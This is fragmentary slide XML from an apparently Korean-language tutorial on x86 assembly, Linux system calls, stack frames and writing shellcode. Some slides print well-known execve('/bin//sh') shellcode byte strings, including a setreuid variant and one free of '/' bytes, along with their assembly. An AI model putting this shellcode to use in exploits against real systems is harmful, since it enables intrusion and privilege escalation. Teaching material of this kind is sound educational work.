      </p:pic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34828"/>
            <a:ext cx="3345989" cy="481104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그리고 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>name </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>변수를 출력합니다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1611463" y="5055573"/>
            <a:ext cx="2752820" cy="7121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364283" y="5411661"/>
            <a:ext cx="5091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112056"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:push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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>name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536F074-A236-43AD-9E42-E69C2F6C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62" y="1222130"/>
            <a:ext cx="2752820" cy="5078017"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic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34828"/>
            <a:ext cx="3345989" cy="481104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마지막으로 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>exit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>를 통해 끝냅니다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1611463" y="5767754"/>
            <a:ext cx="2752820" cy="448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364283" y="5829300"/>
            <a:ext cx="576994" cy="1626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95928"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:push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Your name</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0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F51062A6-3519-4A37-962F-8C6DCE21A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97" y="1754660"/>
            <a:ext cx="7028934" cy="4927494"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1300" dirty="0"/>
              <a:t>이번에 새롭게 쓰인 시스템 콜은 바로</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1300" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1300" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1300" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1300" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1300" dirty="0" err="1"/>
              <a:t>sys_read</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1300" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1300" dirty="0"/>
              <a:t>입니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1300" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1300" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1300" dirty="0"/>
              <a:t>c </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1300" dirty="0"/>
              <a:t>언어 코드로 바꿔보면</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1300" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1300" dirty="0"/>
              <a:t>read(stdin, name, 20);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1300" dirty="0"/>
              <a:t>로 나타낼 수 있습니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1300" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1300" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1300" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1300" dirty="0"/>
              <a:t>이제 시스템 콜을 사용 하는 방법은 어느정도 알게 되었습니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1300" dirty="0"/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5C1379E-8A2E-4B99-BB10-27B7E2902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75" y="2260721"/>
            <a:ext cx="5153025" cy="31432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2E1056E7-1332-44BA-9980-7DADC6281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128" y="2575046"/>
            <a:ext cx="2002939" cy="122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0723"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:push dir="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891993"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:push dir="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FA1ED84-9748-4E06-9E40-B06DA8A4C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089" y="1517038"/>
            <a:ext cx="1933575" cy="4105275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D3892ABE-A54B-4A62-B9C0-8A57D6B4E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175" y="5038358"/>
            <a:ext cx="538162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70697"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:push dir="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EEF02E1-1FFA-47E0-836C-B6ECA618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66" y="1397978"/>
            <a:ext cx="1933575" cy="410527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97978"/>
            <a:ext cx="3345989" cy="474789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ko-KR" altLang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>처음 시작하면 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0x41414141 (AAAA)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>를 스택에 넣습니다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675185" y="1767254"/>
            <a:ext cx="1198222" cy="338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2048608" y="1960684"/>
            <a:ext cx="1626577" cy="2901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820481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:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{70DECDD5-02D3-4ED7-AF49-CA112B2F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이런 것들을 보신적이 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" err="1"/>
              <a:t>있으신가요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25D384-3F39-4198-98FD-B0830052390F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1229752" y="1882839"/>
            <a:ext cx="7536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\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\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xcd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\x80</a:t>
            </a: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\x31\xc0\xb0\x31\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xcd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\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\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xcd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\x80</a:t>
            </a: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\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\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xcd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\x80</a:t>
            </a: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pt-BR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\x31\xc0\x50\x68\x61\x61\x73\x68\x68\x61\x62\x69\x6e\x80\x34\x24\x4e\x80\x74\x24\x04\x4e\x80\x74\x24\x05\x4e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US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44E8BD-7942-4DB0-B1F8-1091BEE0605C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1241476" y="2105575"/>
            <a:ext cx="7536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/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="12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sh</a:t>
            </a:r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쉘코드</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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(23 Byte)</a:t>
            </a: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2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setreuid</a:t>
            </a:r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2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geteuid</a:t>
            </a:r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(), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="12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geteuid</a:t>
            </a:r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()); </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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코드</a:t>
            </a:r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/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="12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sh</a:t>
            </a:r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쉘코드</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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(25 Byte)</a:t>
            </a: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‘/’ (0x2f)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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 없는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="12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쉘코드</a:t>
            </a:r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(39 Byte)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2800453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EEF02E1-1FFA-47E0-836C-B6ECA618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66" y="1397978"/>
            <a:ext cx="1933575" cy="410527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97978"/>
            <a:ext cx="3345989" cy="474789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sub_func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를 호출합니다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675185" y="2286000"/>
            <a:ext cx="1198222" cy="1230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2048608" y="2286000"/>
            <a:ext cx="1626577" cy="2461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화살표: 원형 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{766AC593-CFE2-419F-8ABB-0E2DC51EA880}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5223418" flipV="1">
            <a:off x="1193023" y="2672781"/>
            <a:ext cx="1693296" cy="967153"/>
          </a:xfrm>
          <a:prstGeom prst="circularArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 3687"/>
              <a:gd name="adj2" fmla="val 429849"/>
              <a:gd name="adj3" fmla="val 21106587"/>
              <a:gd name="adj4" fmla="val 10800000"/>
              <a:gd name="adj5" fmla="val 947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382841"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:push dir="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EEF02E1-1FFA-47E0-836C-B6ECA618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66" y="1397978"/>
            <a:ext cx="1933575" cy="410527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97978"/>
            <a:ext cx="3345989" cy="474789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0x42424242 (BBBB)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>를 스택에 넣습니다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675185" y="2787162"/>
            <a:ext cx="1274884" cy="11342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2048608" y="3754315"/>
            <a:ext cx="1626577" cy="33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272441"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:push dir="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EEF02E1-1FFA-47E0-836C-B6ECA618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66" y="1397978"/>
            <a:ext cx="1933575" cy="410527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97978"/>
            <a:ext cx="3345989" cy="474789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esp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주소의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값을 출력합니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>. (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>스택의 맨 마지막에 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>push </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>된 값 출력</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500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675185" y="3526447"/>
            <a:ext cx="1198222" cy="9884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2048608" y="4185138"/>
            <a:ext cx="1626577" cy="6594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864910"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:push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EEF02E1-1FFA-47E0-836C-B6ECA618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66" y="1397978"/>
            <a:ext cx="1933575" cy="410527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97978"/>
            <a:ext cx="3345989" cy="474789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push </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>했던 스택을 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pop </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>합니다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675185" y="4114800"/>
            <a:ext cx="1274884" cy="8924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2048608" y="4862146"/>
            <a:ext cx="1626577" cy="2901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103671"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:push dir="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EEF02E1-1FFA-47E0-836C-B6ECA618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66" y="1397978"/>
            <a:ext cx="1933575" cy="410527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97978"/>
            <a:ext cx="3345989" cy="474789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ret</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>를 통해 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>main</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>으로 돌아갑니다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675185" y="4554415"/>
            <a:ext cx="1266092" cy="6945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2048608" y="5108331"/>
            <a:ext cx="1626577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454435"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:push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EEF02E1-1FFA-47E0-836C-B6ECA618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66" y="1397978"/>
            <a:ext cx="1933575" cy="410527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97978"/>
            <a:ext cx="3345989" cy="474789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esp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주소의 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>값를</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 출력합니다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exit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>를 통해 종료합니다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675185" y="2875085"/>
            <a:ext cx="1198222" cy="21541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2048608" y="2505808"/>
            <a:ext cx="1626577" cy="7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435550"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:push dir="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EEF02E1-1FFA-47E0-836C-B6ECA618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66" y="1397978"/>
            <a:ext cx="1933575" cy="410527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5CDCF2-C45C-46BF-8C8F-D7F7E9C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Stack Frame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6799C4-FE53-45E8-AA2E-ADF02C5DE779}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4873407" y="1397978"/>
            <a:ext cx="3345989" cy="474789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exit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>를 통해 종료합니다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7F1B4A6-D3DF-41AF-83AF-BE473DD3F761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675185" y="3508131"/>
            <a:ext cx="1198222" cy="19167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9CF8F02-A083-4A54-9F5D-653BF6736436}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2048608" y="3279531"/>
            <a:ext cx="1626577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364001"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:push dir="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Let’s make shell code!</a:t>
            </a:r>
            <a:endParaRPr lang="en" dirty="0"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500" dirty="0"/>
              <a:t>Finally, Let’s make shell code!</a:t>
            </a:r>
            <a:endParaRPr lang="en" sz="1500" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="84" name="Shape 84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000" dirty="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lang="en" sz="3000" dirty="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573177977"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:push dir="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05C12484-1333-4ABD-9B78-F9E57AF8E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182" y="1985961"/>
            <a:ext cx="2690079" cy="3612763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8257059"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:push dir="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05C12484-1333-4ABD-9B78-F9E57AF8E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90" y="1898038"/>
            <a:ext cx="2690079" cy="3612763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4" name="텍스트 개체 틀 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6CC019F9-A761-418A-B344-87A045122075}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4873407" y="1714500"/>
            <a:ext cx="3345989" cy="443136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ko-KR" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>을 통해서 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>를 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>으로 만든 뒤</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>스택에 넣어줍니다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202C6906-0403-4AC2-B79B-60DE6E9DFA5D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106008" y="2031023"/>
            <a:ext cx="852854" cy="10199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7E178FC7-5931-4653-9E27-24C27D1B040F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2787162" y="2831125"/>
            <a:ext cx="1318846" cy="4396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97941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FE24712D-1A9C-438A-9BDC-3E699100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이런 것들 은요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25D384-3F39-4198-98FD-B0830052390F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1278603" y="1851401"/>
            <a:ext cx="41335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xor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eax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,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eax</a:t>
            </a:r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push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eax</a:t>
            </a:r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push 0x68732f2f</a:t>
            </a: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push 0x6e69622f</a:t>
            </a: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mov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ebx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,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esp</a:t>
            </a:r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push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eax</a:t>
            </a:r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push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ebx</a:t>
            </a:r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mov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ecx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,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esp</a:t>
            </a:r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xor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edx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, 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edx</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR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mov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 al, 0xb</a:t>
            </a:r>
          </a:p>
          <a:p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	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Ubuntu Mono" panose="020B0509030602030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Ubuntu Mono" panose="020B0509030602030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 0x80</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Ubuntu Mono" panose="020B0509030602030204" pitchFamily="49" charset="0"/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A1ED226B-D880-4898-A415-77B2922C2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721" y="1851401"/>
            <a:ext cx="27622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9485"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:push dir="u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4B0C1B6A-879F-44C5-8479-1BE20F710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90" y="1898038"/>
            <a:ext cx="2690079" cy="3612763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4" name="텍스트 개체 틀 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6CC019F9-A761-418A-B344-87A045122075}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4873407" y="1714500"/>
            <a:ext cx="3345989" cy="443136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/bin//</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sh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문자열을 거꾸로 스택에 넣어줍니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>..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202C6906-0403-4AC2-B79B-60DE6E9DFA5D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255476" y="2690446"/>
            <a:ext cx="703386" cy="8484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7E178FC7-5931-4653-9E27-24C27D1B040F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2787161" y="3341078"/>
            <a:ext cx="1468315" cy="395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817700"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:push dir="u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A1DD9BB0-969B-46FF-8537-FDCD32CA6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90" y="1898038"/>
            <a:ext cx="2690079" cy="3612763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4" name="텍스트 개체 틀 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6CC019F9-A761-418A-B344-87A045122075}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4873407" y="1714500"/>
            <a:ext cx="3345989" cy="443136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현재 스택에 있는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/bin//</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>의 주소를 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>를 통해서 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ebx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>에 넣어줍니다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202C6906-0403-4AC2-B79B-60DE6E9DFA5D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106008" y="3138854"/>
            <a:ext cx="767399" cy="6770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7E178FC7-5931-4653-9E27-24C27D1B040F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2787162" y="3701567"/>
            <a:ext cx="1318846" cy="2285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057785"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:push dir="u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C8B3C60E-D0A3-4B8F-8A6B-BAC9FEC9E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90" y="1898038"/>
            <a:ext cx="2690079" cy="3612763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4" name="텍스트 개체 틀 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
